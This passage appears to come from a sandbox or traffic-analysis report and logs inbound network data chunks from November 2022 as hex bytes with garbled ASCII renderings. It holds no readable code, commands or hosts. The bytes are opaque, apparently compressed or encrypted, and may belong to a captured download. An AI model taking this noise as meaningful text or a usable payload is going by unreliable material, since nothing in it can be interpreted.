81 f2 4e b5 4a e9 f5 aa e9 c4 c3 db ff 34 8b 58 49 2a c7 d7 2a 1b e4 72 d1 c9 3e 81 5d ca 91 c1 7b 05 32 e0 66 85 8d 8a 33 d8 cf 3f 16 90 e0 37 00 57 ff f7 f9 d1 d4 33 da 03 c5 10 8c 1b 18 00 00 3a 09 05 f0 32 c2 3b fc 7e Data Ascii: (f@V%Fz/fC~=[3N0Lf2f;4"CE.5c^2>.t+VH'L8np31TdIqD)fnf0[2A;q3=T%xrRNJ4XI*r>]{2f3?7W3:2;~
2022-11-07 22:49:09 UTC	9017	IN	Data Raw: b1 cf 31 85 a7 ac 53 66 66 bf 52 6d 4c d6 72 b5 16 b9 89 6d cc 5d bc 30 ff 8d ea 82 10 09 72 39 b9 9e 0f 7e 12 ec 84 ef bd e7 47 fd c4 43 ab 55 5a fb 43 63 74 c4 f6 e3 83 f2 94 9d 15 c3 2c 8e da 43 71 24 8c 7a 8c 93 51 4c b3 f5 4b da b1 af bf b3 b1 95 8e 8d 2a f7 95 07 bc 9b 8f be 85 04 11 81 61 79 3d 82 54 04 f3 43 f8 fc dd 0e bc a7 44 45 10 21 9e fa ad e4 b5 48 9f 83 10 ec 1b c2 3c ee 54 fc 3e 7d 10 96 27 2e 77 93 dd 8d d3 84 9d 90 5f 8e 37 12 19 97 a0 d7 ed c4 a5 c3 3f 27 91 1e cd bf cf f4 aa 31 ff 11 e9 15 67 58 10 d9 4b 22 9a 81 25 82 25 d5 6f 25 c2 80 ba ef 27 f8 e3 82 ef cb 9a 6e 6d 3a d9 76 9f 89 df 38 3e 9f 00 10 8b 03 b9 1c bd 30 44 ef 00 eb a5 fd 8c 45 38 3e 96 dd 77 26 fe 56 42 3b 8c b1 a3 3f 9c 6c 0f 0f bb 9c 17 63 ec e3 cd 6d 71 ea d5 f4 ff Data Ascii: 1SffRmLrm]0r9~GCUZCct,Cq$zQLK*ay=TCDE!H<T>}'.w_7?'1gXK"%%o%'nm:v8>0DE8>w&VB;?lcmq
2022-11-07 22:49:09 UTC	9033	IN	Data Raw: d4 a2 74 f0 a1 4a 16 39 50 c7 ff 03 70 75 7e 03 9b 59 1c 1b 78 4c 76 bb 38 cc 85 db 4c f4 a3 01 96 c1 74 bb 96 60 f5 50 f8 a3 eb 01 f8 9f ff 16 e5 27 3d 00 f8 8e 03 f2 f8 e4 a6 f2 7d 74 06 7e 34 d8 eb fd 7e b3 c9 03 29 55 61 fd f8 e9 f0 49 5a 17 00 f5 49 ca fd 2c 69 41 3e b2 8e ed 02 00 a3 fd 09 2d 91 df 66 85 44 f0 5c 3e 74 2d dd 2f 8c 4d bc f0 a8 bf c6 04 83 8f ff ed 57 26 27 1a 22 76 4a c1 8e 32 f8 f6 56 a2 06 72 c4 30 57 59 58 18 f7 c4 49 41 f7 da 28 58 9c c9 55 e9 7e 15 f2 d7 14 d4 db 07 fc 05 65 68 d2 b9 64 71 f5 33 d9 49 fa 80 70 be fc 0e fe 4a 99 00 1d a9 c4 02 6b 1d f5 66 72 19 16 4b 59 bf ff cc a8 64 81 fc 6e ae fc 17 6c 18 db 0b ea e9 68 3b 71 00 8b 06 a7 e7 66 81 39 39 ab 75 0b 36 f7 c3 31 59 c4 05 1c 44 49 01 a1 8d ff 81 ad 50 03 a5 ea 52 17 Data Ascii: tJ9Ppu~YxLv8Lt`P'=}t~4~)UaIZI,iA>-fD\>t-/MW&'"vJ2Vr0WYXIA(XU~ehdq3IpJkfrKYdnlh;qf99u61YDIPR
2022-11-07 22:49:09 UTC	9049	IN	Data Raw: df be 7c 12 c2 db 70 48 cd da 7e 00 65 86 95 0d 93 6e 3c 94 af ae 4d e5 94 3e 91 2f 1a 50 6e e7 4b e2 67 b9 c7 68 61 e2 c2 09 33 f2 13 9c a2 1d 8d 46 c4 62 86 c1 6f 71 71 67 ac 92 5f d3 9f 43 df 5a 8f 46 b4 cd 60 e4 e2 8c 7d d1 ee 35 84 51 b0 3d e0 6b f5 7b 39 6f 4f 6c 82 7f 01 9a 1d 01 ff cc 3a 05 5c e3 1f c0 ce 2f 67 ec 97 e3 85 39 00 47 dd 98 4f 2a 15 5d 8b 78 84 b4 98 dc fd 4e ae 7b 9d 00 14 0f 55 23 fe 64 d3 34 0e 6b cb e0 5e 47 f2 2b fe ea 7c 23 e8 bb d7 68 2c 4a e7 1c cd 3f e8 ee 7a 0f 13 30 30 16 6e b3 53 5f 9e cc 45 89 74 ba 86 74 47 8f 0c f0 28 6d 6d 00 6d 6c 83 34 2a db 6f 81 ed a3 3a 96 b0 0d fb 8c 0b 42 ce 42 ac 43 07 35 71 d9 a9 ba 88 59 f9 f8 c2 70 0e 75 75 4d 17 12 92 78 ee 06 40 30 99 42 e4 74 25 c4 3d 98 85 32 3c 97 38 2d fd 3d 94 51 39 Data Ascii: \|pH~en<M>/PnKgha3Fboqqg_CZF`}5Q=k{9oOl:\/g9GO]xN{U#d4k^G+\|#h,J?z00nS_EttG(mmml4o:BBC5qYpuuMx@0Bt%=2<8-=Q9
2022-11-07 22:49:09 UTC	9065	IN	Data Raw: 84 6c ae 8e 19 1c d9 83 28 29 16 34 ff e7 b6 a3 08 98 dd d8 1b 5a 46 35 55 fe a1 98 04 8a 3d 88 14 85 29 2a b1 2b 6b b8 9b 96 5a 53 6e 0e ff 42 1e c4 cb 13 ed 48 62 2a 54 1f a7 f8 36 b5 59 76 1f 8b ca 43 ab b6 66 06 12 91 04 45 c8 a4 84 7e a4 b3 28 29 2b 77 e7 a5 ee ac 80 6a 77 fc 63 4c f5 59 fa 8d 81 a3 d3 39 f3 4d 86 95 b9 21 aa 5c 0c 77 42 4c 49 77 9d ac 00 be 43 31 77 f1 18 5d d2 d8 a0 de 4e 55 5e 3b df 1e 20 44 55 90 5a a8 d1 8c 99 3f 42 29 74 59 03 46 06 66 e7 06 dc 3d d0 1f 19 d1 52 53 87 71 e1 eb 00 e9 d9 5e c8 a3 65 d5 43 b6 c2 71 fa 1d db 53 58 d6 a8 1d 60 d6 94 17 4d d3 55 1e 5f e8 3d 70 ae 8a 1a 56 bf bb 20 18 68 87 f7 b7 af 00 9c 73 f3 dd da 55 e1 35 18 43 f9 57 f2 82 a2 3d bc 91 8f 9b f1 51 69 6a e2 49 c7 d5 5a 34 a7 bf de cb b9 ed 07 03 52 Data Ascii: l()4ZF5U=)+kZSnBHbT6YvCfE~()+wjwcLY9M!\wBLIwC1w]NU^; DUZ?B)tYFf=RSq^eCqSX`MU_=pV hsU5CW=QijIZ4R
2022-11-07 22:49:09 UTC	9081	IN	Data Raw: 00 ca 0b 23 99 9f 55 99 74 fa 2d bf c5 af 16 b2 fb 19 c2 38 99 e3 a0 c0 d0 84 40 bb da be 49 33 5d ba 86 fc ff 5e 72 d4 3a 87 d4 39 74 ec 79 cc 3c b3 ca 02 e9 18 f7 fc ff a7 0e 2f 16 6d c6 fd ff 2f 39 e1 0b a2 f8 3b e3 4c f5 d5 d1 50 24 71 37 6e 70 00 2f e2 5a 25 fc f1 80 4c 20 e6 70 32 76 1f 5b 00 66 a8 e3 e4 2c 2a 68 f0 48 86 ab da 5b 81 bb 1b 47 65 27 5d 66 a7 5b 09 2a 8c 00 1e 21 cc cf fc ff c2 32 74 f0 9a 15 58 38 45 c1 d1 e9 9c 54 c4 ff 96 f4 21 cc 03 68 b7 6c 55 ff 74 31 7a d7 80 d6 36 8d b6 fc 3d fe ff 66 32 c3 d2 89 ac ed 0b 7f 30 d7 66 0f 60 e7 81 ef a5 8d ff ff 35 c1 b7 2b 3c 98 07 cc 04 3a 2d 07 e5 f1 fc d1 2a bf ea 65 aa 7d e3 06 35 e3 02 f7 7f 6c 2e 35 81 d8 0f ca 7a 47 09 39 3f d5 03 ea 40 f8 ef c9 fa e0 ca 42 37 bc 25 99 b3 f0 5e 61 29 65 Data Ascii: #Ut-8@I3]^r:9ty</m/9;LP$q7np/Z%L p2v[f,hH[Ge']f[!2tX8ET!hlUt1z6=f20f`5+<:-*e}5l.5zG9?@B7%^a)e
2022-11-07 22:49:09 UTC	9097	IN	Data Raw: 31 3f ea 7a fb 1d a7 63 72 a8 32 75 e3 7c 8f 2e 69 1d 7d f9 99 0d 16 fb fd 06 47 7a 84 0f fe 0f 47 11 20 10 f4 fa fc 5c ca ea aa a7 f8 4f b0 54 ef 4f f1 92 21 3d f4 eb 4d 0d e1 71 e5 96 60 4c 56 05 88 04 2d 3f dc 80 84 fd 5b 9b 03 4c bb 13 ce c0 0c 6d b9 3b a5 85 93 09 cf c4 1e 20 cf b2 52 40 47 be 3a ad b8 47 b6 ba c4 bf 1b bc 4f 5b 9a 46 d1 2e 64 30 0c 0a 73 d3 c1 67 67 3c 6e 46 46 67 dc bc 78 db db 02 b9 49 bc 4e b7 0d 9a f9 a0 ee 2f 9c 8b a8 dd c9 8e ae b0 9e 90 b2 b5 10 95 2f 14 38 48 ba f4 29 81 54 56 3f 8b 0f 68 8c 21 3b 96 9f b8 36 38 cf 15 32 fb 53 2d ca 42 e0 9f 92 43 b5 04 01 27 8b f2 b8 36 de ac 47 16 6b 78 56 05 0f 8e 4a ca 24 4f 96 df 08 d2 e7 6a f7 ba f1 6f 75 ae fc cb 55 52 80 3a 02 a1 1b 8a da ef d3 ca dd 7f 4b af 5f de 61 15 9d 5d 39 0f Data Ascii: 1?zcr2u\|.i}GzG \OTO!=Mq`LV-?[Lm; R@G:GO[F.d0sgg<nFFgxIN//8H)TV?h!;682S-BC'6GkxVJ$OjouUR:K_a]9
2022-11-07 22:49:09 UTC	9113	IN	Data Raw: 67 17 52 68 07 1b fa 78 18 02 3d 47 8e a1 cf 77 92 60 b9 19 44 0e 76 b2 e1 d9 bf 71 47 3f 08 5e fd cf 47 ea 8e fa 99 46 30 e6 42 f1 89 82 89 16 2e f8 23 02 5b c4 9e fa f2 70 c5 e3 55 20 91 07 97 ab f0 84 6d 21 c0 f5 14 26 60 69 02 16 3c d0 21 29 90 a0 23 b1 1a ad 82 3d 2a 6d 37 ef d9 19 3d 33 4c d3 12 80 df 79 df d0 e2 bc 38 74 f9 f1 97 15 b2 93 ec 7a e8 d7 5d 30 e6 fb 04 a4 08 ca 08 57 8a c8 dc 01 df 27 13 be 45 36 8a ba 35 d3 7e ea d7 16 c1 e5 52 f8 ec 1e 7c 46 81 89 1d fa 12 ee f9 78 07 f3 b1 c6 cc 09 9d de 80 1e 32 4b d6 b8 1d fa 45 2d f2 c6 6f 77 1b 0b 05 83 30 85 01 00 9c c3 de 59 11 e5 03 23 53 85 b9 9e 6a a9 32 98 a9 af e2 1e 87 cd cc a8 cb 57 81 55 66 d6 c7 57 85 75 db 92 e2 ca c0 46 7a 2d ec 02 f1 be ee 2d 2b ac 9a a7 43 e8 0c 44 e0 cf a1 c7 50 Data Ascii: gRhx=Gw`DvqG?^GF0B.#[pU m!&`i<!)#=*m7=3Ly8tz]0W'E65~R\|Fx2KE-ow0Y#Sj2WUfWuFz--+CDP
2022-11-07 22:49:09 UTC	9129	IN	Data Raw: 47 04 fe a0 5f 56 34 3b 8f 76 4e d0 8a a1 f8 b2 85 14 f2 e4 76 6f ee f2 8e e0 d4 dc 27 53 76 0a 32 c3 61 7d 1f 9c f8 4a 48 db 1e 0f 11 11 61 05 d2 69 d5 b0 8f 29 2f 29 65 a1 87 d3 7c cf 8f 79 99 1d aa 0c 95 ec 43 3f 9a 7e a1 6f a3 b9 26 e3 de 86 bd 63 67 5d 34 de 96 5c 95 71 7c b3 c7 e3 e8 ef a9 a6 60 9d 21 6b 92 1f af d2 fd 3b 3b 4d 20 fa 91 af 36 35 4b d5 9b f2 52 70 89 ab fd c0 67 30 c7 49 95 46 5f b5 10 70 f3 0c d8 34 55 31 f7 12 af b8 6f f3 fc e7 19 b0 51 c9 a0 4b 6a 84 a7 6e 47 95 11 07 f7 89 7c 0f 72 fa e8 71 e9 70 cf f6 3e ef bc be 26 34 b7 48 7d 83 cd 87 45 8a 61 60 cd 29 cb ad 8b 23 52 54 5d f7 32 ee 0f 69 6b f9 ec 7a a5 fb 51 05 17 24 f7 55 66 cb b3 8e 6e 63 f9 29 bc e6 90 a5 4f af 6f 5a ff 00 19 ce fd c3 44 d9 50 5d ce af da a2 e5 7e ef 9a c9 Data Ascii: G_V4;vNvo'Sv2a}JHai)/)e\|yC?~o&cg]4\q\|`!k;;M 65KRpg0IF_p4U1oQKjnG\|rqp>&4H}Ea`)#RT]2ikzQ$Ufnc)OoZDP]~
2022-11-07 22:49:09 UTC	9145	IN	Data Raw: e8 8a 01 18 9d 26 01 c8 18 b8 f3 28 ab e0 76 26 8f 09 0b 3c 46 87 1b de d5 2a e5 f4 82 09 88 42 0d 79 bc d5 42 7f 00 6b e2 46 24 e4 45 a4 84 6b 91 03 74 21 d7 ac 98 8c 46 d2 e8 68 ae 72 ef cd a2 26 3b 02 6a db 9b 8d 37 cf 77 cb e5 e6 b8 08 a8 91 85 3e 63 7f ba 21 b5 66 c2 ce a3 78 c4 35 c4 7a 1a cc c0 65 12 0b fe c4 3f dd b2 c8 48 60 10 81 10 64 3e bf bb 91 b1 36 96 f6 07 82 4e 66 40 10 54 c5 a3 f2 08 79 40 d8 01 19 30 d8 95 22 26 0c 22 3a 95 59 e4 89 d6 7a c7 c3 e5 e4 52 39 35 a5 b4 8f d0 f9 a0 58 ba 28 10 11 d4 cb 4c 0b 00 16 f5 57 fc bf 07 55 49 d5 61 93 03 ca 1a 4a 28 7b 81 06 b1 fb a8 15 27 97 eb c6 cf c9 44 bf 53 be 25 fe 48 c8 97 e0 94 25 ba a6 9c ef 35 d2 9c 16 0d 4b 12 dc ed cc 4a 28 d4 17 e9 fe f0 b7 c7 dd f7 f3 01 6b 26 87 9d 42 46 e5 b8 fd 5c Data Ascii: &(v&<F*ByBkF$Ekt!Fhr&;j7w>c!fx5ze?H`d>6Nf@Ty@0"&":YzR95X(LWUIaJ({'DS%H%5KJ(k&BF\
2022-11-07 22:49:09 UTC	9161	IN	Data Raw: 03 19 e3 ba 0e 16 ed d0 ff f1 7a 7e b5 e9 4c db ec 5a ee 33 6f 43 63 f7 77 0c 6b 1c cb 89 e7 85 af 15 43 cb eb a9 8b fb f2 6d b7 b6 e9 26 cd de 5f da 8b fc 64 ae b6 d7 b7 fc 8f 9b 44 ae 97 ff 4d 52 54 a0 6e 74 f2 1f 25 b1 ca cd 29 8c 5c e9 5b 86 49 b4 bf 3c 1e 93 1e f9 28 2a c7 20 2a a3 25 61 59 dc 5f 87 1e 4d a2 0a 7a 89 64 08 15 57 a5 de 88 5e e9 bf 48 0e 6b 63 8c 73 df 30 1a 7e 4c 95 1b ca 37 b0 d6 8e 58 af 74 8a 16 c9 29 93 4f 73 a2 6f 4c c7 d7 54 55 b2 2e e7 1f ae 96 0f 94 d4 64 2a 4b d0 b6 d2 4c 2a ab d8 9d 14 e3 66 2c 43 d1 c4 90 03 e6 cb 1f 8f b0 0f d0 00 14 5f 5a 60 bb 6e e6 51 ac 1e 26 b2 83 16 00 37 6b 93 bb 78 80 03 df f6 e3 9d c4 7b df a0 50 d1 51 61 24 b8 91 87 49 bf 49 d7 11 26 24 33 ee 1e 72 b0 90 3d ef 28 bd 87 b3 54 cd 7b 1b 48 d7 bb 0e Data Ascii: z~LZ3oCcwkCm&_dDMRTnt%)\[I<(* %aY_MzdW^Hkcs0~L7Xt)OsoLTU.dKL*f,C_Z`nQ&7kx{PQa$II&$3r=(T{H
2022-11-07 22:49:09 UTC	9177	IN	Data Raw: 69 b4 1f 26 fd 86 06 26 f1 b5 03 9f 0b 6e 20 a2 35 64 f7 cb 60 43 31 48 b1 b8 e8 6c 25 e7 b2 56 09 a2 18 8b 63 49 05 c4 8f d4 05 a7 44 9a dc a5 ee 65 06 2b 10 15 72 49 a1 0a a2 68 e4 03 b4 22 90 71 2f f9 68 2f 35 da 28 a3 4f 6f 65 43 47 f0 b8 c1 a1 fd 73 60 21 da bf 28 a8 7a 79 6f 9e b8 7a 57 02 55 63 20 55 a9 cf c0 e3 f0 47 be f6 ef aa 51 7b 6c d3 ed 7e 75 13 06 d2 42 8e f7 dd 8e 82 82 27 be ed 7e 04 ff d6 ae 2f d8 24 b3 a1 21 7e 38 6f 1a b0 c0 1d 2f 84 99 f4 8e ff 61 ce a6 49 1b be f4 fa cc ea 85 3d 70 09 f9 48 2d bd cf 89 c3 29 35 e6 bf 7a 38 5a c7 a4 66 96 a1 53 78 0d 90 81 bc 72 bc 6e 32 3f 4c b7 f4 be 5a b8 5b 96 a1 cc 03 b7 3f ab ea 97 fa 92 85 0e 8f 30 35 43 81 97 2e 00 f0 ab 1c e0 fd 28 1b 39 7a 10 ad 44 4b f1 c2 35 72 7f c4 ed 29 84 e8 d2 a2 0d Data Ascii: i&&n 5d`C1Hl%VcIDe+rIh"q/h/5(OoeCGs`!(zyozWUc UGQ{l~uB'~/$!~8o/aI=pH-)5z8ZfSxrn2?LZ[?05C.(9zDK5r)
2022-11-07 22:49:09 UTC	9193	IN	Data Raw: 02 91 19 a1 e4 98 d6 00 e0 85 35 9e c8 99 fa 27 4e 9f e5 6a 8a b8 05 16 51 fe 95 1f 4b f6 0d d3 23 19 11 2d 04 c3 be 0a 30 b9 77 5f 1e eb 8f 2f f8 ec 00 8d b5 0b 1f e9 ff 09 a2 45 25 71 a0 2e 91 20 08 17 c5 ee de cf f9 fe 00 52 63 06 0b 07 5f 19 71 32 b5 d0 c4 ac 26 44 0c 98 0a 01 80 f2 bf 13 04 14 72 0e 7a 2e 0a 8d 1c 49 48 8d ab 74 31 60 99 be 97 83 be 73 bb 05 71 bf ab 72 ba ba 0e cf 54 14 6e ce 3b f2 dd 83 5b 13 28 ad 5e 62 a9 07 56 21 40 44 3b 40 d6 5c 2c e7 79 b8 48 25 9e a0 d5 3c e7 fc 7b 50 49 9c a3 fa e1 42 84 0b ef ce 15 8a 17 d0 75 0f e7 a3 43 14 22 1d 15 94 23 1e 79 d4 9a 12 c8 f6 b2 0c c6 35 f9 8d 2c a0 24 36 fd 1a 82 6f 87 44 17 bf 61 d3 c3 e3 e9 bb 77 55 64 27 5a 29 16 f7 b0 42 e3 cd 9b d4 d8 e2 55 25 ad 1b 2f 4c d4 d2 14 13 67 61 90 b2 b3 Data Ascii: 5'NjQK#-0w_/E%q. Rc_q2&Drz.IHt1`sqrTn;[(^bV!@D;@\,yH%<{PIBuC"#y5,$6oDawUd'Z)BU%/Lga
2022-11-07 22:49:09 UTC	9209	IN	Data Raw: f8 99 6d 13 51 d0 97 85 15 52 33 95 e0 87 f0 6e 2f 0a 12 0d 62 8d 63 4d d4 98 eb 59 00 fa ea c7 75 c5 7e 64 ef d5 9f 62 c1 8c 70 8a 7f 06 dd 5f 9a 3c 0a f1 3b 98 51 ef 29 34 4c 1d cd 3f 95 9f 57 b8 a7 72 05 e8 60 cb 0a 4f ff 24 11 7b d7 d2 e5 6a f5 cb fc 65 a8 1e 81 d6 04 e9 bc 25 ee 78 a9 db e9 e3 15 58 fe 6d 3c c7 31 bb 42 b7 95 ea 4a a2 a4 8b cb 9c ce 23 c3 fc 7b f3 2f 78 26 7f 09 ef 57 32 71 3e df 9e 5d 4c 08 f1 c5 17 75 0d 50 8e 91 73 e1 08 15 2e fe e2 17 af 22 8f a2 34 0b 51 50 7c fb b3 96 9d db 0c 3b ca 07 13 ee fb 87 bb 3d 91 11 da 23 e2 88 bf 87 a0 2b 82 38 a1 63 2f 2c ed 0b 2a 17 fa f5 33 36 b6 3b b6 ea fc 4c 67 cf 84 dc c7 cc db 2d aa a9 2f 76 94 61 ac e3 78 fd 2c f2 3a dc 75 e6 9e 74 eb 43 f4 84 ba ac 84 f8 d7 0a 6a 8f 28 c3 77 e3 0c b1 3c 4b Data Ascii: mQR3n/bcMYu~dbp_<;Q)4L?Wr`O${je%xXm<1BJ#{/x&W2q>]LuPs."4QP\|;=#+8c/,*36;Lg-/vax,:utCj(w<K
2022-11-07 22:49:09 UTC	9225	IN	Data Raw: 09 6e d2 72 6b 97 90 b9 13 1c 88 26 e6 03 30 60 05 1c 5b 03 00 a2 ab e1 ff 5c 12 04 c7 ff 6c 07 c4 ed 2a 08 51 42 ae f0 30 59 f5 bb 70 8c 9c 7c 70 0a 23 57 e5 73 26 4a 89 9b 5b 71 0d 35 3b 69 da 3d 57 c1 c1 d5 46 1f c1 8c d2 c2 c9 2b 98 a0 39 f6 27 a4 14 a5 fe 12 f6 bd d1 6c 60 65 0b eb 9b 30 e1 ed 24 c2 c3 76 a0 99 93 42 24 30 b4 71 f7 fe bc 2e 7d 4f e1 e2 de 85 ff 3a de 74 13 ed 5f a0 fe a3 79 70 64 de 4b 19 ae ad c7 77 2c 47 38 47 44 ba 2d 40 c4 e2 95 58 3b 24 e7 a6 22 11 fd fd 5a c6 f7 bb 73 7c 92 f7 2e 57 99 1f 76 51 9f 04 e6 31 62 43 05 95 fe 76 3d 74 7e 4b ac 68 b8 5e cb a9 0f 09 1e 65 db 0f 69 e6 4d 75 31 5e bd 20 5f a2 f7 51 55 6a 11 14 11 e9 56 2c 62 6e da a4 2a d4 32 50 73 e2 18 9f a7 e6 ee 88 02 32 31 eb 04 6f 54 96 6f 59 49 27 56 58 ab bd 36 Data Ascii: nrk&0`[\lQB0Yp\|p#Ws&J[q5;i=WF+9'l`e0$vB$0q.}O:t_ypdKw,G8GD-@X;$"Zs\|.WvQ1bCv=t~Kh^eiMu1^ _QUjV,bn2Ps21oToYI'VX6
2022-11-07 22:49:09 UTC	9241	IN	Data Raw: 16 99 60 2d fe 05 15 32 1a 45 de 5e de 1a a0 47 f0 8c bf 7c 5e 22 ce 62 79 ef fd 4e e0 bd 5c dc 1b 14 00 a0 37 96 50 90 1d 71 5e 97 a9 3e 85 a5 6d 88 cd d3 d6 bb 2a 98 1a 39 90 53 df f2 04 62 fe 71 89 dc 41 98 c6 34 e7 05 10 4f d3 01 00 d3 d6 23 50 2f 1f 59 80 4d 01 f4 f5 41 00 e0 26 3e 37 f8 5c 0f bd ca ed fb f9 fd 76 80 f8 e8 75 88 ed f5 8f ba 13 2c 99 76 7f c1 55 ba 73 28 62 51 04 00 54 03 a1 2c 25 dd bb 41 e5 51 d8 21 db b8 e0 96 c3 2a 08 c2 54 36 2e 60 c5 19 00 c0 a6 be e5 b2 c1 04 47 ff d0 20 7a 74 77 06 80 31 9f 62 b1 1e 69 d7 91 da a9 01 12 d7 10 24 b2 eb 54 b2 6b 26 ff 07 ff 0d a3 7c af 5d 68 57 a0 d0 38 56 97 a9 ad df 31 bf af 92 c4 cf 70 f9 60 5e 94 cb 00 6d fe db 15 51 36 47 dd c9 67 b7 37 96 b7 c3 76 a5 aa 2d bf b2 b8 08 2d df 65 7e fa 89 c1 Data Ascii: `-2E^G\|^"byN\7Pq^>m9SbqA4O#P/YMA&>7\vu,vUs(bQT,%AQ!T6.`G ztw1bi$Tk&\|]hW8V1p`^mQ6Gg7v--e~
2022-11-07 22:49:09 UTC	9257	IN	Data Raw: 72 b6 d0 ba 86 0a 72 56 b4 a1 46 25 99 cf c2 b2 18 23 9a 5f 87 b9 23 a1 71 9f 3f 88 a4 01 b3 71 bc 1a 88 41 a8 d2 bb 24 f8 28 96 dd be f8 dd 15 1a c5 61 36 22 66 1d 1b aa 8d 12 11 30 4d 07 62 c2 f3 69 0b a6 c5 26 aa 09 69 1f b7 91 af 33 47 78 68 7d 2a 8b 67 64 c4 d7 6d be 0a f2 71 59 85 cc b0 62 ad 88 40 10 2e fb 72 4b 2d 15 fd 02 5d b4 3b 49 67 b8 e7 10 55 39 9b 92 9b b0 d1 13 06 63 72 c8 6e 39 b5 e1 5f 78 a6 73 5a 02 48 e2 f8 15 85 6d cb f9 1c f1 c5 5f 14 59 dc c2 05 57 71 cb 39 a2 e4 0d e4 3d d4 24 6d c1 a7 77 53 63 95 31 1c 74 4b fb a5 d7 a6 1b 54 d9 c7 d0 cb c0 ff 14 46 38 7a 9e 24 be b3 89 27 ab ac 40 f7 33 ce b1 63 78 e4 c1 bd 5c 87 0d 8b 51 04 a6 74 ff a8 0c 6b 30 9d 6a fb 99 dd 9a ef 00 b3 8d f6 50 81 11 a5 52 8c d2 ae 3f b7 02 4a 7d ec dc 02 60 Data Ascii: rrVF%#_#q?qA$(a6"f0Mbi&i3Gxh}*gdmqYb@.rK-];IgU9crn9_xsZHm_YWq9=$mwSc1tKTF8z$'@3cx\Qtk0jPR?J}`
2022-11-07 22:49:09 UTC	9273	IN	Data Raw: 1e 0d bd 1d 47 76 b4 ab ec d9 e7 9d 5f d4 e8 1f 7f 41 8c 56 02 4c 8c 2b aa a9 24 d9 fb d1 fb d0 e9 7a 0a ba 5b 60 02 c6 1a 1c 4e f8 3c 80 d4 43 18 4c 6c 14 6a f5 54 f6 ae 0e e2 55 f5 18 ea b1 74 a4 ef d3 88 80 29 24 8a ce 7c dc 72 cc a2 27 2b ae 25 8d ac 98 a2 3f 31 c1 1c 38 1a 09 bb 85 1f c0 47 6e 67 a4 81 af dd 82 b9 82 60 b1 33 9e 65 a4 1f c4 de a4 d2 c1 2a a1 8f e4 16 4b 35 c1 a3 e0 47 c6 60 04 ba 84 db f5 7e f9 05 44 c8 f6 fd ca db 30 df 0a c8 ea 11 0a a1 11 06 9c 7a 27 b4 85 7d fc 84 ee 25 d0 af e2 83 8a 39 21 e1 f1 08 ef 58 1b db 35 75 e3 94 ac 5a da 16 b1 7b 46 05 9f d9 20 3f 7a 7b 5e 04 d3 fd c7 88 aa c2 07 d0 4b 66 29 00 31 35 31 c4 4c 14 00 8e 81 fb d1 af 28 63 b6 a1 f0 75 55 16 9d 53 b6 9f b9 91 4f 09 ea c8 f4 84 71 c9 84 b4 72 81 65 ee 3c f8 Data Ascii: Gv_AVL+$z[`N<CLljTUt)$\|r'+%?18Gng`3e*K5G`~D0z'}%9!X5uZ{F ?z{^Kf)151L(cuUSOqre<
2022-11-07 22:49:09 UTC	9289	IN	Data Raw: e3 62 0c ea f1 fe b9 31 36 10 ff 14 f3 6a 3b 24 5b 56 09 c5 c6 0b 20 55 7f 14 85 9e 6e 0c 83 06 29 31 c4 24 b6 20 fa d4 8d 45 9f 3e 9b 03 f8 76 1d ee 6f dc f4 30 39 90 f1 04 c0 df a4 ef 11 ff 26 8c 70 51 6e b1 c4 6e 51 46 81 f3 91 0f 77 55 83 dd dd f5 be 60 dc 71 01 00 98 e2 18 08 40 b9 3a d7 76 72 6f 7e a2 9a 7b b3 80 8e 2b 3d 4f a1 f4 80 18 ea ee 63 89 c1 78 95 8a cb 8d d1 ee 8a 82 22 63 15 87 35 4f 37 a2 02 ce 27 31 d0 77 5a 84 c7 f6 46 f1 51 36 7f 7d a8 e5 12 0c a8 8c b8 ad c4 2e a8 74 fe d4 e9 2e f8 95 d9 00 4f 69 9c 22 25 bf 50 ff 13 47 05 5f 3c d7 c7 10 36 62 e9 78 8f 45 61 e7 4d f9 0a 0d 7c fb 0b 94 72 ce 87 08 9e 9f a7 1f 34 df 41 32 83 02 ed 9e f1 d8 4b 26 c9 c7 0a e8 31 80 79 5d 1c d2 bc bc 61 2a c2 70 22 26 e6 05 d9 44 06 a2 3b db 79 b1 ee ae Data Ascii: b16j;$[V Un)1$ E>vo09&pQnnQFwU`q@:vro~{+=Ocx"c5O7'1wZFQ6}.t.Oi"%PG_<6bxEaM\|r4A2K&1y]a*p"&D;y
2022-11-07 22:49:09 UTC	9305	IN	Data Raw: f5 d3 d4 04 3c 6b 56 1d 9f f8 dc 26 da 43 91 30 0e 45 e8 c9 ef 73 6f 94 3f 41 dc 1e 59 fe 95 cd 36 7b 4a 23 91 f2 f9 d7 e3 1e b5 a3 48 e3 d6 b5 04 36 71 57 1f 55 93 f7 50 51 e6 0d 49 1d b2 1c 11 ba 3a f5 49 39 6f 91 21 be 71 62 2d 4d b5 f4 d2 e5 a7 98 df ef 19 88 0d 47 83 f3 cb 9b a7 58 75 78 7c bb f3 f4 88 1a f3 69 70 7f 49 c9 74 10 0e 0e 33 1f f3 54 0e 65 0b 2e 9e 76 47 29 6e 36 c6 4b 4d 98 7d 35 30 98 0e 9a d6 7a b3 ab ee dd 42 31 08 81 13 9b 06 33 9c fc 8d e4 05 a1 72 3c 1e c4 ba 94 6c 11 07 92 bf cd c2 ea 0a 40 b1 ae f1 f5 c8 cb 75 3f 21 e3 8a f9 7c 1a 3f 8a 5d 8e c2 17 72 4e 21 4a 5e ea 26 e1 50 66 58 80 cb f4 d7 34 fc 46 a4 68 87 e0 63 e5 0f 5b d4 c2 b7 ef ec 73 9c 74 a3 75 31 13 ef 3f 05 7e 62 15 d8 8a 33 e3 4d 0d af ed 3b 97 ee ee fd 36 f6 dd 9f Data Ascii: <kV&C0Eso?AY6{J#H6qWUPQI:I9o!qb-MGXux\|ipIt3Te.vG)n6KM}50zB13r<l@u?!\|?]rN!J^&PfX4Fhc[stu1?~b3M;6
